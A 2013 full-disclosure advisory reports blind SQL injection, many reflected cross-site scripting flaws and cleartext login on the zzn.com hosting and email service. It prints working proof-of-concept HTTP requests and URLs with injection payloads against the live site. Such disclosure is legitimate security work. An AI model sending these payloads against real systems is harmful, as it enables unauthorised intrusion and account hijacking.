ZZN (Web Hosting and Free email accounts) suffers from cross site scripting, remote blind SQL injection, and credential disclosure vulnerabilities.
6366cc696316ce5d9a9ad1c083d31746295d4a474bb3f4aeb475ce0ef05f30a9
ZZN (Web Hosting and Free email accounts) Blind SQLInjection / Cross Site Scripting /User credentials are sent in clear text/
==================================================================================================================================================
Report-Timeline:
================
2013-07-18: Researcher Notification I
2013-07-19: Researcher Notificaction II
2013-07-20: Researcher Notificaction III
2013-07-20: Vendor Feedback
2013-07-22: Ask About the Issues I / Not Response
2013-07-23: Ask About the Issues II / Not Response
2013-07-26: Not Response / Not Fixed
2013-08-02: Not Response / Not Fixed
2013-08-09: Full Disclosure
I-VULNERABILITIES
======================
#Title: ZZN (Web Hosting and Free emailaccounts) Blind SQLInjection / Cross Site Scripting /User credentials are sent in clear text/
#Vendor:http://www.zzn.com
#Author:Juan Carlos García (@secnight)
#Follow me
http://highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight
II-Introduction:
======================
ZZN is a web hosting e-mail service.ZZN mail lets you create your OWN Web site and customized email service.
Users can sign up and login to your email from www.your-name.zzn.com, or directly from your website.
-Build a great FREE Website
-Increase site stickiness by having users check their mail from your site.
-Brand your email colors and logos to that of your site.
-Choose from 14 interface languages.
-Promote your site using the tagline attached to every outgoing message.
-Keep in touch with your users using the mailing list feature.
III-PROOF OF CONCEPT
======================
BLIND SQL INJECTION
______________________________________
Blind SQLinjection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement
and doesn't properly filter out dangerous characters.
Attacks
-------
1-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com
%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=
2-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com
%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=
Multiple CROSS SITE SCRIPTING
_______________________________
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not,
it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application
to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
Affected items
/membersarea_en/alertwindow.asp
/membersarea_en/copy%20of%20emailaccount.asp
/membersarea_en/directemailerror.asp
/membersarea_en/home.asp
/membersarea_en/insidelogin.asp
/membersarea_en/joinframes.asp
/membersarea_en/loginerror.asp
/membersarea_en/preminder.asp
/membersarea_en/signup.asp
/membersarea_en/support_abuse.asp
Proof Of Concept
----------------
These files have at least one input (GET or POST).
/membersarea_en/home.asp - 3 inputs
/membersarea_en/joinframes.asp - 2 inputs
/membersarea_en/emailaccount.asp - 4 inputs
/membersarea_en/preminder.asp - 1 inputs
/membersarea_en/signup.asp - 2 inputs
/membersarea_en/support.asp - 1 inputs
/membersarea_en/insidelogin.asp - 2 inputs
/membersarea_en/directemailerror.asp - 1 inputs
/membersarea_en/alertwindow.asp - 1 inputs
/membersarea_en/loginerror.asp - 1 inputs
/membersarea_en/support_abuse.asp - 1 inputs
/membersarea_en/copy%20of%20emailaccount.asp - 1 inputs
/membersarea_en/directregister.asp - 1 inputs
/zlog - 1 inputs
/zlog/blog_error.asp - 1 inputs
TOO MANY Cross Site Scripting
There are many more variants in both methods, I put these failures as an example .. but I repeat again, there are many more variants of these failures
Method GET
----------
http://www.zzn.com/membersarea_en/alertwindow.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903379%29%3c%2fScRiPt%3e
http://www.zzn.com/membersarea_en/alertwindow.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903379%29%3c%2fScRiPt%3e
http://www.zzn.com/membersarea_en/directemailerror.asp?message=915766%27%28%29920634
http://www.zzn.commembersarea_en/insidelogin.asp?fromPage=%22%20onmouseover%3dprompt%28908665%29%20bad%3d%22
http://www.zzn.com/membersarea_en/joinframes.asp?main=join&type=%22%20onmouseover%3dprompt%28922666%29%20bad%3d%22
http://www.zzn.com/membersarea_en/loginerror.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28958884%29%3c%2fScRiPt%3e
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=%22%20onmouseover%3dprompt%28910568%29%20bad%3d%22&LastName=&type=webmaster
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=%22%20onmouseover%3dprompt%28939138%29%20bad%3d%22&LastName=&type=website
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28927027%29%20bad%3d%22&type=webmaster
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28949012%29%20bad%3d%22&type=community
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28967610%29%20bad%3d%22&type=family
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28960668%29%20bad%3d%22&type=website
http://www.zzn.commembersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=&type=%22%20onmouseover%3dprompt%28942440%29%20bad%3d%22
Method POST
-----------
POST /membersarea_en/copy%20of%20emailaccount.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
company=SECNIGHT&firstname=%22%20onmouseover%3dprompt%28968469%29%20bad%3d%22&Interface=0&lastname=secnight&LoginPage=1
POST /membersarea_en/copy%20of%20emailaccount.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
company=secnight&firstname=%22%20onmouseover%3dprompt%28960576%29%20bad%3d%22&Interface=0&lastname=secnight&LoginPage=1
POST /membersarea_en/home.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
DoLogin=True&image1=&LogFlag=1&SubDomain=999971%22%28%29997917&UserPassword=
POST /membersarea_en/insidelogin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
DoLogin=True&FromFrames=True&FromWhere=false&image1=&origPage=20&SubDomain=986581%28%29996458&UserPassword=secnight
POST /membersarea_en/insidelogin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
DoLogin=True&FromFrames=True&FromWhere=false&image1=&origPage=20&SubDomain=986581%28%29996458&UserPassword=g00dPa$$w0rD
POST /membersarea_en/preminder.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
NotFirstTime=true&rqHintSubDomain=%22%20onmouseover%3dprompt%28956443%29%20bad%3d%22
POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
confirm=&Country=__&DefaultLanguage=1&EMail=%22%20onmouseover%3dprompt%28927344%29%20bad%3d%22&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$
$w0rD&SiteURL=http://highsec.esS&NOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102
POST /membersarea_en/signup.asp?type=website HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=%22%20onmouseover%3dprompt%28961485%29%20bad%3d%22&Phone=555-666-
0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102
POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Length: 325
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=%22%20onmouseover%3dprompt%28948601%29%20bad%3d
%22&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102
POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$
$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=%22%20onmouseover%3dprompt%28967492%29%20bad%3d%22&yob=0&zip=94102
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
beenThere=secnight&company=highsec&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=%22%20onmouseover
%3dprompt%28983845%29%20bad%3d%22&VirtIP=
USER CREDENTIALS ARE SENT IN CLEAR TEXT
_______________________________________
User credentials are not encrypted when they are transmitted.A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.Because user credentials usually are considered sensitive information, it
is recommended to be sent to the server over an encrypted connection of course.
Affected items
/membersarea_en/home.asp (13310f83d103a349490b8582539e8e21)
/membersarea_en/home.asp (4aaaffaf70dda99921aec4f1b2ceda9b)
/membersarea_en/insidelogin.asp
/membersarea_en/insidelogin.asp (4ea409a137fbaff8d5b639c5c42f16fb)
/membersarea_en/insidelogin.asp (58b6536a2fd7f196e5ff147122d20d98)
/membersarea_en/insidelogin.asp (67306227331ba5cbb21a0c2aebce7241)
/membersarea_en/insidelogin.asp (b67529bf426329db238325c03ba3ac46)
/membersarea_en/insidelogin.asp (b91e4b1df6bdc5d9e626034018953543)
/membersarea_en/loginbox.asp
/membersarea_en/signup.asp
/membersarea_en/signup.asp (134f342931a2e21525c6aa2cc3172a10)
/membersarea_en/signup.asp (6951aefa9721a0c5da3591ca525d49fe)
/membersarea_en/signup.asp (6afc2b9654e79ff801823fbaf74a6984)
/membersarea_en/signup.asp (80e7b7df44c32c456eb77aa274db4c08)
/membersarea_en/signup.asp (9791cfb3ed5d1e88c7a13337e5afb6da)
/membersarea_en/signup.asp (9b77eec0e71402d51f3f9b4bc0bd36f9)
/membersarea_en/signup.asp (c18e6bf01d3e39b1b9bccf1a50909498)
/membersarea_en/signup.asp (d087acb8154fc2e7ac71718a76ecf9b1)
/membersarea_en/signup.asp (d3c9ccf4d5c2c129b6eaa3c685ad11ef)
/membersarea_en/signup.asp (decad2f3bdc62c80a19d23c110dd40d4)
/membersarea_en/signup.asp (f321b396abface84ca2dc3a5facb1bd4)
/membersarea_en/signup.asp (f9583d9e844817a92b7f0743a7c9becf)
Examples ( TOO MANY variants)
POST /membersarea_en/home.asp HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 8d3b79cd70a5d7b8b5b273ddce225c7a
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://www.ZZN.COM/membersarea_en/home.asp?from=g1&s=www.zzn.com
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.ZZN.COM
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
DoLogin=True&image1=&LogFlag=1&SubDomain=&UserPassword=
GET /membersarea_en/insidelogin.asp?fromPage=homepagez.asp
POST /membersarea_en/signup.asp?type= HTTP/1.1
Pragma: no-cache
Password: 8d3b79cd70a5d7b8b5b273ddce225c7a
filelist;aspectalerts
Referer: http://www.ZZN.COM/membersarea_en/signup.asp
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE
Host: www.ZZN.COM
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
confirm=&Country=AF&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$
$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102
IV. CREDITS
-------------------------
This vulnerabilities has been discovered
by Juan Carlos García(@secnight)
V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.